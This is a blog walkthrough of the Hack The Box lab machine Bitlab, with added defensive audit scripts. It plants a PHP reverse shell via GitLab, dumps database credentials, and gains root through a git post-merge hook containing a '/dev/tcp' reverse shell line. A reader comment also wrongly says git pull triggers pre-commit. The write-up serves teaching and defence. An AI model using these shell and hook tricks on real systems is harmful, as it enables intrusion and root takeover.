Hack The Box Bitlab Walkthrough – 10.10.10.114

Hack The Box Bitlab is a medium-difficulty Linux machine. There are a couple of ways to exploit this machine; I’m going to use the intended one. The other way involved good old OllyDbg, which I honestly don’t like 🙂

I’ve added the machine IP 10.10.10.114 to /etc/hosts as bitlab.htb. Let’s start with an nmap port scan, a mandatory first step for any machine.

Here is the nmap scan results:

 ⚡ ⚙ root@ns09~/htb/bitlab nmap -p- -sT -sV -sC -oN initial-scan bitlab.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 09:24 +03
Nmap scan report for bitlab.htb (10.10.10.114)
Host is up (0.15s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
|   256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_  256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open  http    nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://bitlab.htb/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 371.91 seconds
 ⚡ ⚙ root@ns09~/htb/bitlab 

Nmap reports only two open ports: port 80, an Nginx web server, and port 22, SSH. Since port 22 needs credentials to log in to the machine, I proceed to see what’s running on port 80.

The Nginx on port 80 hosts GitLab Community Edition (a web-based DevOps lifecycle tool that provides a Git repository manager with wiki, issue-tracking and CI/CD pipeline features, under an open-source license; ref: Wikipedia).

As the GitLab page needs credentials to log in, I went looking for other ways in. Some HTB users on the forum suggested GoBuster, but I found an easier way to find directories: robots.txt. The site’s robots.txt reveals a lot of directories that it disallows for search engines.

Getting The Credentials

I checked through the different directories one by one and found some interesting hex within the source code of the /help directory:

The last part of the source code is a hex-encoded GitLab login script that contains a username and password. After decoding the hex with http://ddecode.com/hexdecoder/, I had valid credentials for the page: clave:11des0081x
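Hex-encoding a login script does not protect the credentials in it; it only hides them from a casual read. The following is an added example (not part of the original walkthrough) of the check a reviewer or secret scanner could run over page source or repository files to surface hex-hidden strings: it decodes runs of JavaScript \xNN escapes and bare hex literals and flags the ones that read like credentials. The page source it scans is constructed for the example, as are the exampleuser/examplepass and hunter2 values.

```python
import re

# Constructed sample page source (not the real Bitlab /help page): a script that hides
# a form-filler string behind JavaScript \xNN escapes, plus a bare hex literal.
def _js_hex(text: str) -> str:
    """Encode text as JavaScript \\xNN escapes, the form obfuscated scripts use."""
    return "".join(f"\\x{b:02x}" for b in text.encode())

SAMPLE_SOURCE = f"""<html><body>
<!-- build: 0123456789abcdef0123456789abcdef -->
<script>
document["{_js_hex('write')}"]("hi");
var creds = "{_js_hex('login: exampleuser password: examplepass')}";
var note = "{'passwd: hunter2'.encode().hex()}";
</script></body></html>"""

# Runs of 8+ \xNN escapes, and bare hex runs of 8+ bytes (16+ hex digits).
JS_ESCAPE_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")
BARE_HEX_RUN = re.compile(r"\b(?:[0-9a-fA-F]{2}){8,}\b")
CREDENTIAL_HINTS = ("password", "passwd", "login", "user", "token", "secret")

def _decode(hex_digits: str):
    """Return the decoded text, or None when the bytes are not printable text."""
    text = bytes.fromhex(hex_digits).decode("utf-8", errors="replace")
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None

def find_hex_secrets(source: str) -> list:
    """Decode hex-hidden strings in page source and flag credential-like ones."""
    findings = []
    for kind, pattern in (("js-escape", JS_ESCAPE_RUN), ("bare-hex", BARE_HEX_RUN)):
        for match in pattern.finditer(source):
            decoded = _decode(match.group().replace("\\x", ""))
            if decoded is None:
                continue  # e.g. a build hash: valid hex digits, but not text
            findings.append({"kind": kind, "offset": match.start(), "decoded": decoded,
                             "credential_like": any(h in decoded.lower() for h in CREDENTIAL_HINTS)})
    return findings

if __name__ == "__main__":
    for f in find_hex_secrets(SAMPLE_SOURCE):
        print(f["kind"], f["offset"], "CREDENTIAL?" if f["credential_like"] else "text", repr(f["decoded"]))
```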

Using the credentials I obtained, I successfully logged in to the BitLab page. The page contains a few code repositories; let’s go through them.

The Good Old PHP Reverse Shell

Looking through the code repository, I noticed that the user “Clave” is able to edit the profile index.php file. This is great news for me: I can get a reverse shell by modifying index.php. For that, I need my good old friend PenTestMonkey’s PHP reverse shell. I’m going to copy the script and modify it with my local IP and port so the shell calls back to my Kali machine.

I replaced the contents of GitLab’s index.php with my reverse shell script, then clicked the “Commit Changes” button. I made sure my update went through and created a merge request to finish the update.

Getting the Reverse Shell

Once that was done, I set up my listener with nc -nlvp 4444 and opened the page I had just updated (http://bitlab.htb/profile/index.php).

I’m ready to go; I have the reverse shell. However, the shell I have is www-data with low privileges, so I had to run:

 ⚡ ⚙  root@ns09~/htb/bitlab nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.114.
Ncat: Connection from 10.10.10.114:48594.
Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 11:12:47 up  5:01,  0 users,  load average: 0.10, 0.10, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@bitlab:/$ 

I ran sudo -l to get better visibility into what this user is allowed to run:

www-data@bitlab:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on bitlab:
    env_reset, exempt_group=sudo, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bitlab:
    (root) NOPASSWD: /usr/bin/git pull
www-data@bitlab:/$ 

However, I couldn’t do much with a low-privilege shell. After browsing the site for a while, I noticed a snippet containing PHP code that would help me get the DB user credentials. I would need to modify the PHP code to achieve this.

From this:

To this:

Code:

<?php
// Connect to the local PostgreSQL "profiles" database with the credentials from the snippet
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
// Dump every row of the profiles table (this is where the user credentials are stored)
$result = pg_query($db_connection, "SELECT * FROM profiles");

while ($row = pg_fetch_row($result)) {
  var_dump($row);
}
?>

Getting the user.txt

I updated my index.php with this code and browsed the page again.

I now have the DB password in encoded form; I’d need to decode it before I SSH into the box.

string(1) "1" [1]=> string(5) "clave" [2]=> string(22) "c3NoLXN0cjBuZy1wQHNz==" }

I used a decoder on Kali to decode the string. The decoded password was ssh-str0ng-p@ss

I went on to SSH into the box as the user clave. I tried the password ssh-str0ng-p@ss, but unfortunately it didn’t work; I also tried ssh-str0ng-p@ssbase64, which didn’t work either, but it worked when I used the encoded string itself as the password, and I got the user.txt.

 ⚡ root@ns09~/htb/bitlab ssh clave@10.10.10.114
The authenticity of host '10.10.10.114 (10.10.10.114)' can't be established.
ECDSA key fingerprint is SHA256:hNHxoptKsWqkzdME7Bfb+cGjskcAAGySJazK+gDDCHQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.114' (ECDSA) to the list of known hosts.
clave@10.10.10.114's password: 
Permission denied, please try again.
clave@10.10.10.114's password: 
Last login: Thu Aug  8 14:40:09 2019
clave@bitlab:~$ ls
RemoteConnection.exe  user.txt
clave@bitlab:~$ cat user.txt
1e3f[------------]8154
clave@bitlab:~$ 

Privilege escalation

From my earlier reverse shell, I will perform a git pull, since I can execute git pull as root. I need a writable folder to copy the git repository into; as per the forum, a subdirectory of /tmp works.

User www-data may run the following commands on bitlab:
    (root) NOPASSWD: /usr/bin/git pull

I ran the following commands:

$ cd /tmp
$ mkdir nav1n
$ cd nav1n
$ cp -rf /var/www/html/profile .
$ cd profile

After the copy is done, my next step is to create a hook called post-merge, which git executes once the code has been pulled into the nav1n copy. I also need to make the hook file executable with chmod +x.

Here are the commands I ran.

$ echo "#!/bin/bash" > .git/hooks/post-merge
$ echo "bash -i >& /dev/tcp/10.10.14.9/4444 0>&1" >> .git/hooks/post-merge
$ chmod +x .git/hooks/post-merge
$ ls -alh .git/hooks
total 60K
drwxr-xr-x 2 www-data www-data 4.0K Nov 21 12:38 .
drwxr-xr-x 8 www-data www-data 4.0K Nov 21 12:39 ..
-rwxr-xr-x 1 www-data www-data  478 Nov 21 12:38 applypatch-msg.sample
-rwxr-xr-x 1 www-data www-data  896 Nov 21 12:38 commit-msg.sample
-rwxr-xr-x 1 www-data www-data 3.3K Nov 21 12:38 fsmonitor-watchman.sample
-rwxrwxrwx 1 www-data www-data   53 Nov 21 12:42 post-merge
-rwxr-xr-x 1 www-data www-data  189 Nov 21 12:38 post-update.sample
-rwxr-xr-x 1 www-data www-data  424 Nov 21 12:38 pre-applypatch.sample
-rwxr-xr-x 1 www-data www-data 1.7K Nov 21 12:38 pre-commit.sample
-rwxr-xr-x 1 www-data www-data 1.4K Nov 21 12:38 pre-push.sample
-rwxr-xr-x 1 www-data www-data 4.8K Nov 21 12:38 pre-rebase.sample
-rwxr-xr-x 1 www-data www-data  544 Nov 21 12:38 pre-receive.sample
-rwxr-xr-x 1 www-data www-data 1.5K Nov 21 12:38 prepare-commit-msg.sample
-rwxr-xr-x 1 www-data www-data 3.6K Nov 21 12:38 update.sample
$ cat .git/hooks/post-merge
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.9/4444 0>&1
$ sudo git pull
From ssh://localhost:3022/root/profile
   master     -> origin/master
 * [new branch]      patch-2603 -> origin/patch-2603
Updating ccf9eff..6c6f8a7
Fast-forward
 index.php |   2 +-
 1 file changed, 2 insertions(+), 0 deletions(-)

In the meantime, I ran a listener on port 6666 in another terminal.

 ⚡root@ns09~/htb/bitlab nc -nlvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Connection received on 10.10.10.114 36176
bash: cannot set terminal process group (1122): Inappropriate ioctl for device
bash: no job control in this shell
root@bitlab:/tmp/nav1n/profile# cat /root/root.txt
cat /root/root.txt
8d4c[--------------]d587c
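The root cause here is the sudo rule itself: git honours the hooks and config of whatever repository it is run in, so letting www-data run any git subcommand as root is equivalent to letting it run arbitrary commands as root. The following is an added audit script (my example, not from the walkthrough) that flags such sudoers rules and lists the enabled, non-sample hooks in a repository with their owner and world-writability, which is what a defender would check on this box. The sudoers text and the throw-away repository it inspects are constructed, and the regex is a simplified sudoers parser.

```python
import re
import stat
import tempfile
from pathlib import Path

# Any git subcommand granted via sudo is risky: git reads .git/hooks and .git/config from
# the caller's working directory, so a repo the caller can write runs code as the runas user.
GIT_BINARIES = ("git", "/usr/bin/git", "/usr/local/bin/git")
# "user HOST=(runas) [TAG:]... command[, command]" (sudoers syntax, simplified).
SUDOERS_RULE = re.compile(
    r"^(?P<who>\S+)\s+\S+\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")
# Constructed sample sudoers mirroring the sudo -l output seen on Bitlab.
SAMPLE_SUDOERS = """\
Defaults env_reset, exempt_group=sudo, mail_badpass
%sudo     ALL=(ALL:ALL) ALL
www-data  ALL=(root) NOPASSWD: /usr/bin/git pull
"""

def audit_sudoers(text: str) -> list:
    """Return rules that let a user run git, and so its hooks, as another user."""
    findings = []
    for raw in text.splitlines():
        m = SUDOERS_RULE.match(raw.split("#", 1)[0].strip())
        for cmd in (m.group("cmd").split(",") if m else []):
            if cmd.split() and cmd.split()[0] in GIT_BINARIES:
                findings.append({"who": m.group("who"), "runas": m.group("runas"),
                                 "cmd": cmd.strip(), "nopasswd": "NOPASSWD:" in m.group("tags")})
    return findings

def audit_hooks(repo_dir: str) -> list:
    """List enabled hooks (executable, not *.sample) with owner uid and writability."""
    findings = []
    for hook in sorted(Path(repo_dir, ".git", "hooks").iterdir()):
        st = hook.stat()
        if hook.suffix == ".sample" or not st.st_mode & stat.S_IXUSR:
            continue  # git ignores shipped .sample files and non-executable files
        findings.append({"hook": hook.name, "owner_uid": st.st_uid,
                         "world_writable": bool(st.st_mode & stat.S_IWOTH)})
    return findings

def build_demo_repo() -> str:
    """Create a constructed throw-away repo shaped like /tmp/nav1n/profile above."""
    hooks = Path(tempfile.mkdtemp(prefix="hookaudit-"), ".git", "hooks")
    hooks.mkdir(parents=True)
    for name, body, mode in (("pre-commit.sample", "#!/bin/sh\n", 0o755),
                             ("post-merge", "#!/bin/bash\necho ran after git pull\n", 0o777)):
        (hooks / name).write_text(body)
        (hooks / name).chmod(mode)  # 0o777 is the mode seen on the box
    return str(hooks.parent.parent)

if __name__ == "__main__":
    print(audit_sudoers(SAMPLE_SUDOERS), audit_hooks(build_demo_repo()), sep="\n")
```

The fix is to drop the rule rather than to police hook files: git pull as root can never be safe in a repository that www-data can write.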

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug bounty. If you are an HTB user and like my articles, please give respect on my HTB profile: https://www.hackthebox.eu/nav1n

PhoenixKiller
7 months ago

Very nice writeup, I didn’t even realise RemoteConnection.exe was the intended solution! Like you, I always run sudo -l once I get a reverse shell and immediately expected the git pull to be the intended way of getting root 😊 Git has so-called hooks that get executed before or after certain actions. A git pull triggers the pre-commit trigger; I exploited this by setting up a git remote on my own laptop, cloning it from the gitlab box, adding the bash script I want run as root inside the repo directory at .git/hooks/pre-commit, adding a commit on my laptop…
